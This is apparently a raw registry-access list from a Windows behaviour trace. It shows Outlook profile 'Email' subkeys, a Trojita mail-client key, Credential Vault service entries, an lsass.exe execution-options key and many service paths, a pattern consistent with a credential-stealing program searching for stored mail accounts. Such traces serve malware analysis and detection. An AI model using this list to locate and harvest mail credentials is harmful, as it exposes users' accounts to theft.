HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\10b0e4d6eb1de34dabd532a0806a0fec
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\10b0e4d6eb1de34dabd532a0806a0fec\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\192e64c97bf3a54488a039619c763627
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\192e64c97bf3a54488a039619c763627\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\32a3dc9c400a4b448b60ab7fe553a392
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\32a3dc9c400a4b448b60ab7fe553a392\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\43e0bb79f0f2d84db98ff4f730d23d24
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\43e0bb79f0f2d84db98ff4f730d23d24\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\6a50d9bd87f9a8478751861a1591a6c2
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\6a50d9bd87f9a8478751861a1591a6c2\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7760e21103136b47946c9c80fa097f15
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7760e21103136b47946c9c80fa097f15\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7d19c9e894f20d4780a31c9a9f17da11
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7d19c9e894f20d4780a31c9a9f17da11\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\818ecc2f310b344f807e8af5dc013189
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\818ecc2f310b344f807e8af5dc013189\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\Email
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook
HKEY_CURRENT_USER\SOFTWARE\flaska.net\trojita
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanWorkstation\Parameters
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LanmanWorkstation\Parameters\RpcCacheTimeout
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\WOW64
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Public
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Default
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonW6432Dir
HKEY_USERS\S-1-5-18
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18\ProfileImagePath
HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_USERS\.DEFAULT\Environment
HKEY_USERS\.DEFAULT\Volatile Environment
HKEY_USERS\.DEFAULT\Volatile Environment\0
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\Environment
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\ObjectName
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lsass.exe
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppIDSvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppIDSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppIDSvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Appinfo
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Appinfo\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Appinfo\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppMgmt
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppMgmt\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppMgmt\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AxInstSV
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AxInstSV\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AxInstSV\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BDESVC
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BDESVC\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BDESVC\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\bthserv
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\bthserv\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\bthserv\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CertPropSvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CertPropSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CertPropSvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\dot3svc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\dot3svc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\dot3svc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EapHost
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EapHost\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EapHost\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EFS
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EFS\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EFS\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\fdPHost
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\fdPHost\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\fdPHost\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hidserv
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hidserv\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hidserv\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hkmsvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hkmsvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hkmsvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupListener
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupListener\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupListener\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupProvider
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupProvider\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupProvider\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\idsvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\idsvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\idsvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\IPBusEnum
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\IPBusEnum\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\IPBusEnum\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KeyIso
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KeyIso\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KeyIso\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KtmRm
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KtmRm\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KtmRm\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lltdsvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lltdsvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lltdsvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lmhosts
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lmhosts\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lmhosts\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Mcx2Svc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Mcx2Svc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Mcx2Svc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MpsSvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MpsSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MpsSvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSiSCSI
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSiSCSI\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSiSCSI\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Netlogon
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Netlogon\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Netlogon\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetMsmqActivator
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetMsmqActivator\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetMsmqActivator\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetPipeActivator
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetPipeActivator\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetPipeActivator\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpActivator
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpActivator\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpActivator\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpPortSharing
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpPortSharing\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpPortSharing\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2pimsvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2pimsvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2pimsvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2psvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2psvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2psvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PeerDistSvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PeerDistSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PeerDistSvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\pla
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\pla\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\pla\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPAutoReg
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPAutoReg\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPAutoReg\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPsvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPsvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPsvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ProtectedStorage
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ProtectedStorage\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ProtectedStorage\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\QWAVE
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\QWAVE\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\QWAVE\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasAuto
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasAuto\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasAuto\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasMan
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasMan\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasMan\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteAccess
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteAccess\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteAccess\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteRegistry
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteRegistry\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteRegistry\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCardSvr
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCardSvr\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCardSvr\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCPolicySvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCPolicySvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCPolicySvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\seclogon
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\seclogon\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\seclogon\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SensrSvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SensrSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SensrSvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SessionEnv
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SessionEnv\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SessionEnv\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SharedAccess
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SharedAccess\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SharedAccess\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppuinotify
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppuinotify\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppuinotify\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SSDPSRV
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SSDPSRV\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SSDPSRV\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SstpSvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SstpSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SstpSvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\StorSvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\StorSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\StorSvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TabletInputService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TabletInputService\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TabletInputService\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TapiSrv
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TapiSrv\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TapiSrv\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TBS
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TBS\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TBS\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TermService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TermService\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TermService\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\THREADORDER
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\THREADORDER\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\THREADORDER\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UmRdpService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UmRdpService\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UmRdpService\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\upnphost
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\upnphost\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\upnphost\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WbioSrvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WbioSrvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WbioSrvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wcncsvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wcncsvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wcncsvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WcsPlugInService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WcsPlugInService\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WcsPlugInService\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WebClient
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WebClient\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WebClient\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wecsvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wecsvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wecsvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wercplsupport
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wercplsupport\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wercplsupport\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinRM
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinRM\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinRM\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wlansvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wlansvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wlansvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WPCSvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WPCSvc\ImagePath
